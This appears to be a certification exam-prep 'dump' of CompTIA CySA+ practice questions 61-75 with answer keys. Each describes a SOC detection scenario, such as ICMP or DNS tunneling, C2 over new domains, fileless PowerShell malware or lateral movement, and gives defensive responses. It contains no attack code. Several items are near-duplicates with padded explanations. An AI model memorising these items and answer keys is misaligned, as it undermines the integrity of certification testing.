CompTIA CS0-003 CySA+ Exam Dumps and Practice Test Questions Set 5 Q61-75
Visit here for our full CompTIA CS0-003 exam dumps and practice test questions.
Question 61
A SOC analyst identifies multiple endpoints sending continuous ICMP requests to external IP addresses that have no business relationship with the organization. The requests occur in bursts and occasionally include unusually large payloads. What is the most likely threat, and what should the immediate response be?
A) Normal network diagnostics; allow traffic.
B) Reconnaissance activity or ICMP-based tunneling by malware; isolate endpoints, capture traffic, and analyze payloads.
C) Misconfigured monitoring system; update configuration.
D) Temporary network testing; notify users.
Answer: B)
Explanation:
Option A assumes normal diagnostics. Routine ICMP traffic, such as ping tests or network troubleshooting, is predictable, typically originates from authorized systems, and uses standard payload sizes. Bursts of ICMP traffic with unusually large payloads to external, unknown IPs suggest malicious activity rather than routine diagnostics. Ignoring such activity could allow attackers to map the network or exfiltrate data covertly.
Option B is correct. ICMP is often leveraged by malware for reconnaissance, data exfiltration, or covert communication. Large and persistent ICMP payloads suggest tunneling, which can bypass traditional firewall and monitoring controls. Immediate SOC response should involve isolating affected endpoints to prevent further communication, capturing network traffic for analysis, and examining the payloads for signs of sensitive data transfer or malware commands. Endpoint forensics helps identify the processes responsible and potential persistence mechanisms. Analysts should cross-reference the external IPs with threat intelligence to determine if they are associated with known malicious infrastructure. Remediation involves cleaning infected endpoints, updating intrusion detection systems to detect similar ICMP tunneling behavior, and enhancing monitoring for anomalous ICMP traffic. Preserving evidence is critical for forensic analysis and incident reporting.
Option C proposes misconfigured monitoring. Misconfigurations rarely generate bursts of large ICMP packets to external IPs. Assuming this is benign misconfiguration could allow ongoing malicious activity to go undetected.
Option D assumes temporary network testing. Temporary testing is typically documented and predictable, and rarely involves large, repeated ICMP requests to unknown external systems. Treating this as legitimate testing could result in compromised network visibility.
Choosing option B ensures early detection and containment of potential reconnaissance or exfiltration attempts, protects sensitive data, and preserves evidence for further investigation and future threat detection improvements.
Question 62
A SOC analyst observes multiple endpoints repeatedly querying a set of domains that were registered within the past 24 hours. The queries are low volume but highly frequent, and the domains have no reputation history. What is the most likely scenario, and what is the recommended response?
A) Normal DNS caching activity; allow traffic.
B) Malware using newly registered domains for command-and-control; capture DNS traffic, isolate endpoints, and analyze for malware.
C) Misconfigured DNS server; update configuration.
D) Routine cloud service queries; verify vendor.
Answer: B)
Explanation:
Option A assumes normal DNS caching behavior. DNS caching results in predictable query patterns for frequently accessed domains, generally not for newly registered domains with no history. Highly frequent queries to brand-new domains are anomalous and should be investigated. Ignoring this may allow malware communication with external command-and-control servers.
Option B is correct. Attackers often register new domains for command-and-control (C2) infrastructure to avoid detection. Malware will query these domains to receive instructions or exfiltrate data. Indicators include newly registered domains, low-volume but persistent queries, and no legitimate reputation. Immediate response involves capturing DNS traffic to analyze which endpoints are communicating, isolating affected endpoints to prevent further communication, and conducting malware analysis to identify processes responsible. Cross-referencing the domains with threat intelligence may reveal connections to known campaigns. Remediation includes cleaning infected systems, updating DNS security policies, and enhancing monitoring to detect similar suspicious domains. Preserving evidence supports forensic analysis and helps strengthen detection capabilities.
Option C suggests misconfigured DNS servers. Misconfigurations typically result in failed queries or unusual error patterns, not persistent communication with newly registered domains. Treating this as a configuration issue could allow malware to continue communicating undetected.
Option D assumes routine cloud service queries. Legitimate services use known domains with established reputations. Frequent queries to new, untrusted domains are inconsistent with normal cloud operations.
Selecting option B ensures proactive containment, analysis, and remediation of malware using novel infrastructure while protecting sensitive data and maintaining network integrity.
Question 63
A SOC analyst notices multiple endpoints executing scripts that modify firewall rules to allow outbound connections to previously blocked IP addresses. The scripts are obfuscated, execute under elevated privileges, and disable logging of network events. What is the most likely threat, and what is the immediate action?
A) Routine administrative scripts; allow execution.
B) Malware attempting to bypass network defenses and exfiltrate data; isolate endpoints, capture memory, and analyze scripts.
C) Misconfigured security policy; update firewall rules.
D) User testing new scripts; notify users.
Answer: B)
Explanation:
Option A assumes routine administration. Administrative scripts are usually signed, documented, and predictable. Modifying firewall rules to allow previously blocked connections, disabling logging, and running obfuscated scripts under elevated privileges indicates malicious activity. Ignoring this could lead to unmonitored data exfiltration or attacker persistence.
Option B is correct. Malware often modifies firewall rules to evade detection and facilitate communication with external servers for command-and-control or data exfiltration. Indicators include script obfuscation, elevated privileges, and log suppression. Immediate SOC response involves isolating affected endpoints to prevent further unauthorized communication, capturing memory for forensic analysis to identify active processes and scripts, and analyzing scripts to understand the method and intent of the attack. Network traffic analysis helps determine external targets and identify exfiltrated data. Threat intelligence may reveal known infrastructure associated with the malware. Remediation involves cleaning endpoints, restoring security and logging services, and updating firewall rules and detection systems to prevent recurrence. Evidence preservation ensures a comprehensive forensic investigation and supports incident reporting and regulatory compliance.
Option C suggests misconfigured security policies. Misconfigurations typically do not involve obfuscated scripts or deliberate log suppression. Assuming this is a benign configuration issue could result in continued compromise.
Option D assumes user testing. Legitimate testing is usually documented and does not involve disabling logs or bypassing established firewall rules. Ignoring this behavior could result in undetected malicious activity.
Selecting option B ensures early detection and mitigation of malware attempting to evade security controls, preserving evidence and protecting sensitive systems.
Question 64
A SOC analyst identifies Windows endpoints, creating new scheduled tasks that execute external scripts during off-hours. The scripts attempt to disable antivirus services and obfuscate execution commands. What is the most likely threat, and what is the recommended response?
A) Routine administrative automation; allow.
B) Fileless malware establishing persistence and evading security detection; isolate endpoints, capture memory, and analyze scripts.
C) Misconfigured automation tasks; correct scripts.
D) User-initiated testing; notify users.
Answer: B)
Explanation:
Option A assumes normal administrative automation. Typical administrative tasks are documented, predictable, and do not disable antivirus or obfuscate execution. Allowing off-hours obfuscated scripts that tamper with security services could facilitate persistent malware presence.
Option B is correct. Fileless malware often leverages scheduled tasks to maintain persistence and evade endpoint detection. Indicators include off-hours execution, obfuscated code, and attempts to disable security software. Immediate SOC response includes isolating affected endpoints to prevent further compromise, capturing memory to analyze in-memory execution, and examining scripts to understand attacker intent, persistence mechanisms, and potential command-and-control communication. Correlating network traffic identifies external connections, and threat intelligence helps determine whether infrastructure is associated with known malware campaigns. Remediation involves cleaning endpoints, restoring disabled security services, updating detection rules, and monitoring the environment for similar activity. Preserving forensic evidence ensures comprehensive investigation and supports security improvement efforts.
Option C suggests misconfigured tasks. Misconfigurations rarely include obfuscation, external downloads, or security service tampering. Assuming benign misconfiguration risks undetected malware activity.
Option D assumes user testing. Legitimate testing is typically documented and does not involve disabling security controls or obfuscated scripts. Ignoring this could lead to persistent malware activity.
Selecting option B prioritizes containment, investigation, and remediation while preserving forensic evidence and improving detection of advanced threats.
Question 65
A SOC analyst observes Linux endpoints making persistent outbound connections over non-standard TCP ports to external IPs. System logs show execution of unexpected processes, and connections occur continuously outside normal operational hours. What is the most likely threat, and what should the SOC do first?
A) Routine system administration; allow.
B) Covert command-and-control communication or exfiltration by malware; isolate endpoints, capture network traffic, and analyze processes.
C) Misconfigured automation; correct scripts.
D) Monitoring software; verify with vendor.
Answer: B)
Explanation:
Option A assumes routine administration. Normal administrative activity is predictable, occurs on standard ports, originates from known systems, and aligns with maintenance schedules. Continuous connections over non-standard ports by unexpected processes suggest malicious activity. Allowing this could result in ongoing exfiltration or unauthorized remote control.
Option B is correct. Persistent outbound connections over non-standard ports often indicate malware establishing command-and-control channels or exfiltrating sensitive information. Indicators include continuous activity outside normal hours, unusual processes initiating connections, and targeting unknown external IPs. Immediate SOC action includes isolating affected endpoints to prevent further compromise, capturing network traffic for analysis to determine external endpoints, and analyzing processes for malware behavior. Cross-referencing IPs with threat intelligence helps identify malicious infrastructure. Remediation involves cleaning infected endpoints, updating detection systems, strengthening firewall rules, and monitoring for similar activity across the network. Preserving forensic evidence ensures accurate threat analysis, reporting, and post-incident review.
Option C suggests misconfigured automation. Misconfigurations rarely result in persistent connections to unknown external IPs over non-standard ports. Assuming benign misconfiguration could allow attackers to maintain access.
Option D proposes monitoring software. Legitimate monitoring is predictable, uses known servers, and standard ports. Observed continuous non-standard connections are inconsistent with normal monitoring.
Selecting option B ensures proactive containment, forensic analysis, and remediation, protecting endpoints from persistent threats and maintaining operational integrity.
Question 66
A SOC analyst identifies endpoints making repeated outbound HTTPS connections to domains that have been registered within the last 48 hours. The traffic volume is low, and the endpoints execute scripts that dynamically generate the requests. What is the most likely threat, and what should the SOC do first?
A) Normal application updates; allow traffic.
B) Malware using newly registered domains for command-and-control; capture traffic, isolate endpoints, and analyze scripts.
C) Misconfigured web application; update settings.
D) Legitimate testing of cloud services; notify users.
Answer: B)
Explanation:
Option A assumes normal updates. Application updates are typically predictable, connect to known vendor domains, and rarely occur continuously with dynamically generated requests. Ignoring low-volume but frequent HTTPS traffic to newly registered domains risks missing malware communication.
Option B is correct. Attackers frequently register new domains to host command-and-control infrastructure and avoid reputation-based detection. Indicators include newly registered domains, low-volume but persistent connections, dynamically generated requests from scripts, and lack of legitimate documentation. Immediate SOC response includes isolating affected endpoints to prevent further outbound communication, capturing HTTPS traffic for analysis, and examining scripts for command-and-control behavior. Analyzing traffic patterns can reveal data exfiltration attempts or malware instructions. Threat intelligence can determine whether these domains are associated with known campaigns. Remediation involves cleaning affected endpoints, updating detection rules to recognize similar C2 behavior, and monitoring other endpoints for anomalous traffic. Preserving forensic evidence is critical for incident investigation and future prevention.
Option C suggests misconfigured web applications. Misconfigurations generally do not create persistent, scripted outbound connections to newly registered external domains. Treating this as benign misconfiguration risks undetected malware activity.
Option D assumes legitimate testing. Testing activity is usually documented and predictable. Unplanned low-volume, off-hour HTTPS requests to new domains are unlikely to be legitimate.
Selecting option B ensures proactive containment, forensic analysis, and mitigation of malware attempting to use new infrastructure for command-and-control or data exfiltration.
Question 67
A SOC analyst observes Windows endpoints creating new scheduled tasks that download scripts from untrusted sources, obfuscate execution commands, and attempt to disable logging services. What is the most likely threat, and what is the recommended response?
A) Routine administrative automation; allow execution.
B) Fileless malware establishing persistence and evading detection; isolate endpoints, capture memory, and analyze scripts.
C) Misconfigured automation tasks; correct configuration.
D) User testing; notify users.
Answer: B)
Explanation:
Option A assumes routine automation. Legitimate administrative scripts are typically documented, predictable, and signed. Disabling logging services and downloading external scripts with obfuscated commands indicates malicious activity. Ignoring this could allow persistent malware presence and exfiltration.
Option B is correct. Fileless malware often leverages scheduled tasks for persistence while evading endpoint detection systems. Key indicators include off-hours execution, obfuscation, external downloads, and log tampering. Immediate response involves isolating affected endpoints to prevent lateral movement, capturing memory to analyze in-memory execution and running processes, and examining scripts for malicious activity. Network traffic analysis identifies potential command-and-control communication. Threat intelligence may identify known infrastructure or malware families. Remediation involves cleaning endpoints, restoring security services, updating detection rules, and monitoring for similar activity in the environment. Evidence preservation ensures thorough forensic investigation, supports regulatory reporting, and improves future threat detection capabilities.
Option C suggests misconfigured automation tasks. Misconfigurations rarely involve obfuscation, log tampering, or external downloads. Treating this as benign misconfiguration risks ongoing malware activity.
Option D assumes user testing. Legitimate testing is documented, occurs under authorized accounts, and does not involve disabling logging or executing obfuscated scripts.
Selecting option B ensures containment, investigation, and remediation of advanced threats while preserving evidence and enhancing future detection.
Question 68
A SOC analyst notices Linux endpoints performing repeated failed login attempts on administrative cloud accounts from IP addresses across multiple countries. These attempts target several high-privilege accounts and continue outside business hours. What is the most likely threat, and what should the SOC do first?
A) User mistyping credentials; notify users.
B) Credential-stuffing attacks; block IPs, enforce MFA, and audit account activity.
C) Legitimate mobile logins; allow.
D) Misconfigured cloud services; adjust settings.
Answer: B)
Explanation:
Option A assumes user errors. Occasional mistyped passwords are normal, but repeated failed login attempts from global IP addresses targeting multiple administrative accounts indicate malicious intent. Ignoring this could result in compromised accounts and unauthorized access.
Option B is correct. Credential-stuffing attacks involve attackers using stolen credentials or guessing passwords to access high-privilege accounts. Immediate mitigation includes blocking offending IP addresses, enabling multi-factor authentication, auditing account logs for successful and failed attempts, and monitoring for abnormal activity. Threat intelligence may reveal known attack infrastructure. Following mitigation, accounts should be reset, strong password policies enforced, and user access validated to prevent future compromise. This approach minimizes risk, secures high-value accounts, and supports continuous monitoring for anomalous behavior.
Option C assumes legitimate mobile logins. Legitimate access is typically from recognized devices, IP ranges, and predictable locations. Multiple failed login attempts from international IPs are inconsistent with normal behavior.
Option D suggests cloud misconfiguration. Misconfigurations do not generate repeated failed login attempts across multiple IPs and accounts. Assuming a configuration issue risks overlooking an active attack.
Choosing option B ensures rapid containment, secures administrative access, and strengthens overall cloud account security posture.
Question 69
A SOC analyst observes endpoints accessing rarely used network shares during off-hours, reading portions of files, and attempting unauthorized writes. What is the most likely threat, and what is the immediate response?
A) Normal backup activity; allow.
B) Malware performing lateral movement or reconnaissance; isolate endpoints, review logs, and perform endpoint analysis.
C) Misconfigured scheduled tasks; update configuration.
D) Legitimate off-hours user activity; notify users.
Answer: B)
Explanation:
Option A assumes backup activity. Backups typically access full files at scheduled times, involve known accounts, and follow predictable patterns. Accessing portions of files and attempting unauthorized writes indicates suspicious activity rather than routine backup. Allowing this could enable malware to propagate or gather sensitive information.
Option B is correct. Malware often performs lateral movement by accessing network shares to discover data and permissions. Indicators include rare share access, partial file reads, unauthorized writes, and activity outside normal hours. Immediate response involves isolating affected endpoints to prevent further compromise, reviewing file access logs to determine what resources were targeted, and performing endpoint analysis to identify malware or scripts facilitating movement. Remediation involves cleaning infected endpoints, strengthening access controls, updating monitoring rules, and validating account integrity. Preserving forensic evidence ensures incident investigation and helps refine detection capabilities.
Option C suggests misconfigured scheduled tasks. Misconfigurations usually impact a limited scope and do not create suspicious patterns across multiple endpoints. Treating this as benign misconfiguration risks persistent malware activity.
Option D assumes legitimate off-hours activity. Users rarely access unused shares and attempt unauthorized writes during off-hours. Ignoring this could allow malware reconnaissance and movement to continue.
Selecting option B ensures early detection, containment, and remediation, protecting sensitive data while maintaining network integrity.
Question 70
A SOC analyst observes endpoints executing scripts that download files from untrusted external servers directly in memory. No disk artifacts are left, and antivirus has not detected any threats. What is the most likely scenario, and what should the SOC do first?
A) Routine software installation; allow execution.
B) Fileless malware leveraging memory execution; isolate endpoints, perform memory forensics, and analyze scripts.
C) Misconfigured automation scripts; correct scripts.
D) Legitimate patching process; verify with administrator.
Answer: B)
Explanation:
Option A assumes software installation. Legitimate software installation uses signed binaries, leaves disk artifacts, and follows predictable procedures. Running untrusted scripts entirely in memory is highly suspicious and inconsistent with standard IT operations. Ignoring this may allow fileless malware to persist undetected.
Option B is correct. Fileless malware executes primarily in memory, avoiding traditional endpoint detection mechanisms. Indicators include downloading from untrusted servers, memory-based execution, lack of disk artifacts, and absence of antivirus alerts. Immediate response involves isolating endpoints to prevent lateral movement, performing memory forensics to capture running processes and injected code, and analyzing scripts to identify malware behavior and potential command-and-control communication. Network analysis can identify attacker infrastructure. Remediation involves cleaning endpoints, updating detection mechanisms, and monitoring other endpoints for similar activity. Preserving evidence is critical for forensic analysis, regulatory compliance, and improving detection capabilities.
Option C suggests misconfigured scripts. Misconfigurations rarely result in memory-only execution and external downloads. Treating this as benign risks persistence of malware.
Option D assumes legitimate patching. Patching is predictable, documented, and does not involve memory-only execution of untrusted files.
Selecting option B ensures containment, investigation, and remediation of sophisticated memory-based threats while preserving forensic evidence and improving future detection.
Question 71
A SOC analyst identifies endpoints sending low-volume, persistent outbound traffic over unusual ports to multiple external IP addresses. The traffic occurs outside business hours and is encrypted. Antivirus has not flagged any threats. What is the most likely threat, and what should the SOC do first?
A) Normal application updates; allow traffic.
B) Malware establishing covert command-and-control channels; isolate endpoints, capture network traffic, and analyze processes.
C) Misconfigured firewall rules; update configuration.
D) Routine cloud service synchronization; verify vendor.
Answer: B)
Explanation:
Option A assumes normal updates. Application updates are predictable, use standard ports, and connect to known vendor servers. Low-volume, persistent encrypted traffic over unusual ports to unknown IPs outside business hours is inconsistent with routine updates and may indicate malicious activity. Ignoring this could allow attackers to maintain covert control or exfiltrate data.
Option B is correct. Malware often uses non-standard ports and encrypted channels to evade detection while maintaining command-and-control communications. Indicators include off-hour activity, low-volume persistent traffic, unknown external destinations, and lack of antivirus alerts. Immediate response involves isolating affected endpoints to prevent further compromise, capturing network traffic to analyze communication patterns, and performing endpoint forensics to identify processes and scripts responsible. Network analysis can reveal potential data exfiltration or attacker commands. Threat intelligence may identify the external infrastructure. Remediation involves cleaning compromised endpoints, updating detection rules for anomalous outbound traffic, monitoring other systems, and improving controls to prevent recurrence. Preserving forensic evidence ensures a complete understanding of attacker techniques and supports regulatory reporting.
Option C suggests misconfigured firewall rules. Misconfigurations usually result in blocked or failed connections, not continuous encrypted communication to multiple unknown IPs. Assuming benign misconfiguration could allow persistent compromise.
Option D assumes routine cloud synchronization. Legitimate cloud synchronization typically uses known domains, standard ports, and scheduled intervals. Observed activity is inconsistent with normal operations.
Selecting option B ensures early detection, containment, and remediation of covert malware communications while preserving evidence for analysis and improving future detection.
Question 72
A SOC analyst observes multiple Linux endpoints repeatedly performing DNS queries to newly registered domains. The queries include unusually long subdomains with encoded information. What is the most likely threat, and what is the recommended response?
A) Normal DNS resolution; allow.
B) DNS tunneling for covert data exfiltration; capture traffic, isolate hosts, and decode payloads.
C) Misconfigured internal DNS servers; update configuration.
D) Antivirus telemetry using DNS; verify vendor.
Answer: B)
Explanation:
Option A assumes normal DNS resolution. Legitimate DNS queries involve known domains and meaningful hostnames. Queries to new domains with encoded, unusually long subdomains are anomalous. Ignoring this could allow attackers to exfiltrate sensitive data.
Option B is correct. DNS tunneling is a technique to bypass security controls and transmit data covertly. Indicators include newly registered domains, encoded subdomains, and queries outside business hours. Immediate SOC response involves capturing DNS traffic to analyze encoded payloads, isolating affected endpoints to prevent further exfiltration, and conducting endpoint forensics to identify responsible processes. Analysts should correlate DNS activity with SIEM logs to identify affected accounts or data. Threat intelligence can reveal known malicious infrastructure. Remediation includes cleaning endpoints, updating detection rules for DNS tunneling patterns, and monitoring other systems for similar activity. Preserving forensic evidence supports analysis, reporting, and improved future defenses.
Option C suggests that unusual network activity could be attributed to misconfigured DNS servers. DNS misconfigurations, such as incorrect forwarding settings, stale cache entries, or improperly configured zones, can indeed cause unexpected queries or resolution failures. Typically, these misconfigurations result in easily identifiable patterns, such as repeated attempts to resolve internal or external hostnames, delayed responses, or error logs indicating failed lookups. Administrators can usually trace these issues back to specific configuration errors or recent changes, allowing remediation without extensive disruption.
However, the activity described in this scenario—frequent, encoded queries to newly registered domains—does not align with the expected behavior of misconfigured DNS servers. Misconfigurations rarely produce queries that are intentionally obfuscated, encoded, or directed at domains that have only recently been registered. Encoded DNS queries are often used by malicious actors to exfiltrate data, bypass network monitoring, or communicate covertly with command-and-control servers. These queries can encode sensitive information in subdomain labels or other DNS fields, enabling persistent, low-profile data leakage without triggering traditional intrusion detection systems. Similarly, targeting newly registered domains is a common tactic in attacks, as these domains are less likely to be blacklisted or recognized by security tools, making them ideal for establishing stealthy communication channels.
Treating such behavior as benign, based on the assumption of misconfiguration, introduces substantial risk. Malicious actors rely on precisely this type of misclassification to maintain persistence and continue exfiltration over extended periods. Ignoring encoded, anomalous DNS queries allows attackers to retain access, move laterally across the network, or systematically siphon sensitive data. Unlike ordinary DNS misconfigurations, which are usually limited in scope and impact, malicious DNS activity is deliberate, adaptive, and designed to evade detection while extracting maximum value.
Effective response requires careful verification. Security teams should analyze DNS query patterns, identify unusual domain registrations, decode suspicious queries, and correlate them with endpoint activity and other indicators of compromise. This approach differentiates between benign misconfigurations and deliberate malicious activity, enabling targeted mitigation such as blocking suspicious domains, isolating affected systems, and strengthening network monitoring.
While misconfigured DNS servers can cause resolution anomalies, frequent, encoded queries to newly registered domains are highly inconsistent with ordinary misconfigurations. Assuming this activity is benign, persistent risks include data exfiltration and network compromise, highlighting the necessity of careful analysis and prompt remediation to maintain network security.
Option D assumes antivirus telemetry. Telemetry typically uses known domains, is predictable, and does not involve long encoded subdomains. Observed behavior is inconsistent with legitimate telemetry.
Selecting option B ensures containment, analysis, and remediation of covert exfiltration techniques while protecting sensitive data.
Question 73
A SOC analyst detects Windows endpoints executing obfuscated PowerShell scripts that modify registry keys, disable antivirus services, and initiate outbound communication to unknown IPs. No alerts were generated by endpoint security. What is the most likely threat, and what is the recommended response?
A) Routine administrative scripts; allow execution.
B) Fileless malware leveraging PowerShell for persistence and command-and-control; isolate endpoints, capture memory, and analyze scripts.
C) Misconfigured automation scripts; correct scripts.
D) User testing scripts; notify users.
Answer: B)
Explanation:
Option A assumes legitimate administration. Administrative scripts are typically signed, documented, and predictable. Obfuscation, registry modifications, antivirus disabling, and communication to unknown IPs suggest malicious activity. Ignoring this could allow persistent malware and unauthorized access.
Option B is correct. Fileless malware uses PowerShell or other legitimate tools to execute in memory, bypassing traditional detection mechanisms. Indicators include obfuscated scripts, registry modifications for persistence, and outbound communication to unknown hosts. Immediate SOC response includes isolating affected endpoints, capturing memory to analyze in-memory execution, and examining scripts to understand attacker techniques. Network traffic analysis can identify command-and-control servers. Threat intelligence may provide context about known malware families. Remediation involves cleaning endpoints, restoring security services, updating detection signatures, and monitoring for similar behavior. Evidence preservation ensures thorough forensic investigation and supports regulatory reporting.
Option C suggests misconfigured automation. Misconfigurations rarely include obfuscation, disabling security services, or external communication. Treating this as benign could allow malware to persist.
Option D posits that unusual system activity could be the result of legitimate user testing. While testing and experimentation are common in IT and development environments, legitimate testing is typically structured, documented, and performed within defined boundaries. Proper testing procedures usually involve clearly identified accounts, scheduled activities, and coordination with system administrators. Documentation ensures that testing activities are distinguishable from anomalous behavior and do not inadvertently disrupt operational systems. Furthermore, testing rarely involves bypassing security controls, disabling monitoring tools, or using obfuscated scripts, as these actions introduce significant risk and go against established best practices. Legitimate testing is intended to validate functionality, performance, or security under controlled conditions, not to conceal activity or circumvent protective measures.
The scenario described in Option D, which involves disabling security controls, modifying logs, and employing obfuscated scripts, is inconsistent with standard testing practices. Disabling security mechanisms and obscuring activity are tactics commonly associated with malicious actors seeking to avoid detection. Malware and unauthorized users frequently use obfuscation to hide their scripts, alter execution patterns, and maintain persistence within the system. Ignoring such activity under the assumption that it is part of routine testing is dangerous because it could allow a compromise to persist undetected. Attackers often mimic benign activity or appear as routine administrative operations to evade monitoring and analysis. Misclassifying these indicators as legitimate testing can delay detection, giving adversaries additional time to escalate privileges, exfiltrate data, or spread laterally across the network.
Proper incident response requires careful verification of any activity that falls outside expected behavior. Security teams must examine the context of the actions, cross-reference with documented testing procedures, and assess whether the observed behavior aligns with legitimate operational goals. This includes analyzing log integrity, monitoring network connections, and evaluating script behavior for obfuscation or anomalous execution patterns. If activity cannot be correlated with approved testing or scheduled maintenance, it should be treated as suspicious and investigated thoroughly.
Assuming that unauthorized actions are part of testing also undermines security governance and accountability. Legitimate testing should have clear oversight, ensuring that risks are minimized and that any anomalies are reported and addressed promptly. By bypassing these controls, unauthorized activity not only poses a technical threat but also a compliance and regulatory risk.
While user testing is a plausible explanation for some system activity, the presence of disabled security controls, cleared logs, or obfuscated scripts is inconsistent with standard practices. Treating such behavior as benign testing can result in continued compromise, allowing attackers to maintain access, exfiltrate data, or escalate their privileges. Accurate verification, thorough documentation review, and careful analysis are essential to differentiate legitimate testing from malicious activity, ensuring timely detection, containment, and mitigation of potential threats while preserving system integrity.
Selecting option B ensures proper containment, investigation, and remediation while preserving evidence and strengthening future detection.
Question 74
A SOC analyst notices multiple Linux endpoints performing repeated outbound SSH connections to unknown IP addresses on non-standard ports. Unusual processes are observed, and connections occur continuously outside normal hours. What is the most likely threat, and what is the immediate action?
A) Routine system administration; allow.
B) Malicious SSH tunnels for command-and-control or exfiltration; isolate endpoints, capture traffic, and analyze processes.
C) Misconfigured automation; correct scripts.
D) Monitoring software; verify with vendor.
Answer: B)
Explanation:
Option A assumes routine administration. Normal SSH access is predictable, occurs on standard ports, and originates from known sources. Continuous connections over non-standard ports with unusual processes indicate malicious activity. Allowing this could enable covert command-and-control or data exfiltration.
Option B is correct. Persistent outbound SSH connections over non-standard ports are indicative of malware establishing tunnels to maintain covert control or transfer data. Indicators include continuous activity outside normal hours and execution of unusual processes. Immediate SOC response involves isolating affected endpoints to prevent further communication, capturing network traffic for analysis, and performing endpoint forensics to identify malicious processes. Correlating traffic with threat intelligence may reveal attacker infrastructure. Remediation includes cleaning infected endpoints, updating detection rules, strengthening firewall and monitoring controls, and reviewing other endpoints for similar behavior. Preserving forensic evidence ensures accurate incident analysis and supports improved detection capabilities.
Option C raises the possibility that unusual network activity, specifically persistent SSH connections to unknown external hosts, could be the result of misconfigured automation scripts. Automation scripts are commonly used in IT environments to streamline repetitive tasks, manage system configurations, or perform scheduled operations. When these scripts are misconfigured, the issues they cause are typically predictable and confined to errors, failed task execution, or log entries that indicate problems. Misconfigured automation may occasionally produce unintended connections or generate unusual traffic, but these anomalies usually follow a recognizable pattern and are limited to internal resources or authorized endpoints. Administrators can often trace these behaviors back to recent changes in script parameters, scheduling, or coding errors, allowing remediation without extensive disruption.
The scenario described in Option C, however, involves persistent SSH connections to external, unknown hosts, which is inconsistent with the expected behavior of misconfigured scripts. Misconfigured automation rarely establishes repeated, long-term communication with external IP addresses that are not recognized or approved by organizational policies. Such behavior is indicative of deliberate and unauthorized activity, potentially the result of malware, advanced persistent threats, or external attackers maintaining control over compromised systems. Persistent SSH connections are commonly used by attackers to create covert command-and-control channels, allowing them to issue commands, exfiltrate data, or move laterally across the network while avoiding detection.
Treating these connections as benign, based solely on the assumption of misconfigured automation, carries significant risk. By dismissing them as errors or routine script behavior, security teams may fail to detect an ongoing compromise, allowing attackers to maintain access to critical systems. This can lead to data breaches, further malware propagation, or unauthorized access to sensitive information. In addition, automated scripts do not typically include mechanisms for persistence or stealth; they execute predefined tasks and terminate according to schedule. In contrast, persistent external connections suggest an intentional attempt to remain undetected, evade monitoring, and maintain long-term access to the system.
Proper response requires thorough verification, including analysis of network traffic, review of SSH session logs, and forensic examination of the endpoints involved. Identifying the source, purpose, and legitimacy of the connections is critical to distinguishing between accidental script misbehavior and malicious activity. Security teams should also assess whether other indicators of compromise, such as unusual file modifications, cleared logs, or unauthorized user accounts, are present, as these often accompany persistent external connections initiated by attackers.
While misconfigured automation can produce anomalies, persistent SSH connections to unknown external hosts fall outside the scope of typical script errors and strongly suggest malicious activity. Treating such behavior as benign risks ongoing compromise, allowing attackers to maintain covert access, exfiltrate data, and potentially spread within the network. Accurate verification, monitoring, and investigation are essential to ensure that these connections are identified, evaluated, and remediated effectively, safeguarding organizational assets and maintaining system integrity.
Option D assumes monitoring software. Legitimate monitoring uses known servers, standard ports, and predictable schedules. Observed behavior is inconsistent with normal monitoring.
Selecting option B ensures containment, investigation, and remediation of covert malware activity while preserving evidence and strengthening detection.
Question 75
A SOC analyst identifies endpoints repeatedly accessing rarely used network shares, reading small portions of files, and attempting unauthorized writes. The activity occurs primarily outside business hours. What is the most likely threat, and what is the immediate response?
A) Normal backup activity; allow.
B) Malware performing lateral movement or reconnaissance; isolate endpoints, review logs, and perform endpoint analysis.
C) Misconfigured scheduled tasks; correct configuration.
D) Legitimate off-hours user activity; notify users.
Answer: B)
Explanation:
Option A assumes backup activity. Backups typically involve predictable schedules, full file access, and known accounts. Accessing small portions of rarely used shares with unauthorized writes outside business hours is anomalous. Allowing this could enable malware reconnaissance or propagation.
Option B is correct. Malware often performs lateral movement by probing network shares, reading file fragments, and attempting unauthorized writes to map resources. Immediate SOC response involves isolating affected endpoints, reviewing file access logs to determine the scope, and performing endpoint analysis to identify malware or scripts facilitating movement. Remediation includes cleaning infected endpoints, strengthening access controls, updating monitoring rules, and validating account integrity. Preserving forensic evidence ensures effective investigation, incident documentation, and improved detection of similar activity in the future.
Option C suggests misconfigured scheduled tasks. Misconfigurations are usually predictable and affect limited systems. Observed suspicious activity across multiple endpoints is unlikely to be caused by misconfiguration alone.
Option D assumes that off-hours activity on a network or endpoint is legitimate, suggesting that any access to files, shares, or resources outside standard business hours can be considered benign. While it is true that some legitimate operations occur off-hours, such as scheduled backups, automated processes, or maintenance tasks, these activities are typically well-documented, predictable, and limited to known systems and resources. Normal users rarely access infrequently used shares, attempt unauthorized writes, or engage with sensitive resources outside their normal responsibilities. When unusual activity is observed in off-hours periods, especially targeting rarely used or restricted resources, it warrants scrutiny rather than dismissal.
Malware and malicious actors often exploit off-hours windows because network monitoring and human oversight are reduced during these periods. Attackers may use these opportunities to conduct reconnaissance, map network topologies, identify valuable assets, or attempt lateral movement across systems without detection. Low-level activity, such as unauthorized file writes or access attempts on rarely used shares, can indicate that malware is probing the network or establishing footholds in preparation for more extensive operations. If such behavior is treated as legitimate due to its timing, the malicious activity may continue unchecked, increasing the risk of further compromise and data exfiltration.
Behavioral baselines are critical in distinguishing legitimate off-hours activity from malicious activity. Legitimate off-hours processes are generally predictable, scheduled, and documented, often tied to automated tasks or administrative duties. In contrast, unexpected access to rarely used shares, attempts to write to restricted directories, or other anomalous operations do not fit these predictable patterns. These actions may indicate that malware is attempting to escalate privileges, propagate laterally, or gather sensitive information, all while minimizing the likelihood of detection. Ignoring such anomalies based solely on the assumption of off-hours legitimacy bypasses the necessary verification and investigative steps required to assess potential threats accurately.
Proactive monitoring and investigation of off-hours anomalies are essential to prevent compromise escalation. Security teams must analyze access logs, verify user behavior against expected patterns, and correlate unusual activities with other indicators of compromise, such as network traffic anomalies or system changes. Prompt response can isolate affected systems, mitigate malware spread, and prevent unauthorized access to sensitive data. Failure to investigate off-hours anomalies can allow malware to remain operational, increasing both the difficulty of remediation and the potential impact on the organization.
Assuming off-hours activity is benign is a high-risk approach. Normal users rarely engage in accessing unused shares or performing unauthorized writes outside business hours, and malware often exploits these periods to operate covertly. Ignoring such activity can facilitate reconnaissance, lateral movement, and persistent compromise within the network. Careful analysis, contextual evaluation, and verification of anomalous off-hours activity are critical to ensure timely detection and containment of threats while maintaining organizational security.
Selecting option B ensures early detection, containment, and remediation of malware, protecting sensitive data and maintaining network integrity.